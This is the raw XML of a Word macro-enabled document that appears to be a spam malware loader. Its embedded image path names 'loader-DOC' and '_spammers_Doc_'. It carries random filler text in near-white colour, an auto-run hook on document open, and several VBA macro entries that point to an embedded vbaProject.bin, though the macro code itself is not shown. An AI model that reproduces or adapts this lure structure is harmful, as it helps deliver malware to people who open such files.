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BFF73" w14:textId="0D144716" w:rsidR="00754E35" w:rsidRPr="005535E2" w:rsidRDefault="003E260A" w:rsidP="00F91224">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FEFDFE"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidRPr="005535E2">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="FEFDFE"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5DF7C1C6" wp14:editId="1BAC34F4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3600" cy="3838575"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:wrapNone/>
            <wp:docPr id="1" name="Рисунок 1" descr="C:\Users\user\Desktop\loader-DOC\new\_spammers_Doc_\2609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ader-DOC\new\_spammers_Doc_\2609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55EC" w:rsidRPr="005535E2">
        <w:rPr>
          <w:color w:val="FEFDFE"/>
        </w:rPr>
        <w:t xml:space="preserve">9f73qC xr6Zao F1le J0awdS9OvhbHBLJXbvm uRIuhh0ZvAQD93izVlzpFn67 t7yJcNw pfCFTQ dHGuC yso6bO lTOe6DQushp 0P3ighSVPq49liW7BwTPzq80 H</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A255EC" w:rsidRPr="005535E2">
        <w:rPr>
          <w:color w:val="FEFDFE"/>
        </w:rPr>
        <w:t/>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A255EC" w:rsidRPr="005535E2">
        <w:rPr>
          <w:color w:val="FEFDFE"/>
        </w:rPr>
        <w:t/>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00754E35" w:rsidRPr="005535E2" w:rsidSect="00ED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C5"/>
    <w:rsid w:val="00007262"/>
    <w:rsid w:val="000147FE"/>
    <w:rsid w:val="00036CC5"/>
    <w:rsid w:val="00047968"/>
    <w:rsid w:val="00062A8C"/>
    <w:rsid w:val="000C2D9E"/>
    <w:rsid w:val="00110032"/>
    <w:rsid w:val="00120138"/>
    <w:rsid w:val="00122C95"/>
    <w:rsid w:val="001443E7"/>
    <w:rsid w:val="00182ED2"/>
    <w:rsid w:val="00183F53"/>
    <w:rsid w:val="001B5804"/>
    <w:rsid w:val="001C0D9C"/>
    <w:rsid w:val="001F3C97"/>
    <w:rsid w:val="001F45DA"/>
    <w:rsid w:val="00201A85"/>
    <w:rsid w:val="00213F25"/>
    <w:rsid w:val="00232453"/>
    <w:rsid w:val="002628C0"/>
    <w:rsid w:val="002C1BE8"/>
    <w:rsid w:val="00306F39"/>
    <w:rsid w:val="003256D5"/>
    <w:rsid w:val="0032692E"/>
    <w:rsid w:val="0034652D"/>
    <w:rsid w:val="00352003"/>
    <w:rsid w:val="003C53FF"/>
    <w:rsid w:val="003E260A"/>
    <w:rsid w:val="004015DC"/>
    <w:rsid w:val="00406262"/>
    <w:rsid w:val="004109CD"/>
    <w:rsid w:val="00447A5A"/>
    <w:rsid w:val="00480C26"/>
    <w:rsid w:val="004B5AFE"/>
    <w:rsid w:val="005212C5"/>
    <w:rsid w:val="005355F6"/>
    <w:rsid w:val="00546A80"/>
    <w:rsid w:val="005535E2"/>
    <w:rsid w:val="00555F9F"/>
    <w:rsid w:val="005B0A72"/>
    <w:rsid w:val="005F0981"/>
    <w:rsid w:val="00602A39"/>
    <w:rsid w:val="00630D0C"/>
    <w:rsid w:val="00633365"/>
    <w:rsid w:val="00657BE6"/>
    <w:rsid w:val="006A60D1"/>
    <w:rsid w:val="006C1BE1"/>
    <w:rsid w:val="0076770F"/>
    <w:rsid w:val="007858D3"/>
    <w:rsid w:val="007B2969"/>
    <w:rsid w:val="007C1CE4"/>
    <w:rsid w:val="007D3D68"/>
    <w:rsid w:val="00804967"/>
    <w:rsid w:val="00822A0B"/>
    <w:rsid w:val="00877FC3"/>
    <w:rsid w:val="00884853"/>
    <w:rsid w:val="008F1AC6"/>
    <w:rsid w:val="0092784E"/>
    <w:rsid w:val="00931F69"/>
    <w:rsid w:val="00965C14"/>
    <w:rsid w:val="0098059A"/>
    <w:rsid w:val="00991DBF"/>
    <w:rsid w:val="009B088E"/>
    <w:rsid w:val="00A020B3"/>
    <w:rsid w:val="00A04142"/>
    <w:rsid w:val="00A1232B"/>
    <w:rsid w:val="00A255EC"/>
    <w:rsid w:val="00A56EB9"/>
    <w:rsid w:val="00A632C8"/>
    <w:rsid w:val="00A718BF"/>
    <w:rsid w:val="00A872C8"/>
    <w:rsid w:val="00AC06BB"/>
    <w:rsid w:val="00B44624"/>
    <w:rsid w:val="00BD6291"/>
    <w:rsid w:val="00C226E2"/>
    <w:rsid w:val="00C31BDA"/>
    <w:rsid w:val="00C4694D"/>
    <w:rsid w:val="00C62EE0"/>
    <w:rsid w:val="00C63270"/>
    <w:rsid w:val="00C93609"/>
    <w:rsid w:val="00CA23FC"/>
    <w:rsid w:val="00CC1E9A"/>
    <w:rsid w:val="00CD671A"/>
    <w:rsid w:val="00D347F6"/>
    <w:rsid w:val="00D47518"/>
    <w:rsid w:val="00D9516A"/>
    <w:rsid w:val="00DB39DD"/>
    <w:rsid w:val="00E27C0D"/>
    <w:rsid w:val="00E50099"/>
    <w:rsid w:val="00E61674"/>
    <w:rsid w:val="00E736F2"/>
    <w:rsid w:val="00E74B15"/>
    <w:rsid w:val="00EA4583"/>
    <w:rsid w:val="00EC360E"/>
    <w:rsid w:val="00ED58B7"/>
    <w:rsid w:val="00ED7F25"/>
    <w:rsid w:val="00EF6E4C"/>
    <w:rsid w:val="00F03DC5"/>
    <w:rsid w:val="00F91224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75B5"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{69C754D4-69BA-4403-9F30-0F47BAE6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docEvents>
    <wne:eventDocOpen/>
  </wne:docEvents>
  <wne:mcds>
    <wne:mcd wne:macroName="PROJECT.NEWMACROS.A1" wne:name="Project.NewMacros.a1" wne:bEncrypt="00" wne:cmg="56"/>
    <wne:mcd wne:macroName="PROJECT.NEWMACROS.UPDATEFIELDS" wne:name="Project.NewMacros.UpdateFields" wne:bEncrypt="00" wne:cmg="56"/>
    <wne:mcd wne:macroName="PROJECT.THISDOCUMENT.TRANSPOSEPARAGRAPHS" wne:name="Project.ThisDocument.TransposeParagraphs" wne:bEncrypt="00" wne:cmg="56"/>
    <wne:mcd wne:macroName="PROJECT.THISDOCUMENT.STRIPSPACES" wne:name="Project.ThisDocument.StripSpaces" wne:bEncrypt="00" wne:cmg="56"/>
  </wne:mcd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vbaProject" Target="vbaProject.bin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dcterms:created xsi:type="dcterms:W3CDTF">2019-08-15T08:10:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-09-26T19:47:00Z</dcterms:modified>
</cp:coreProperties>
</file>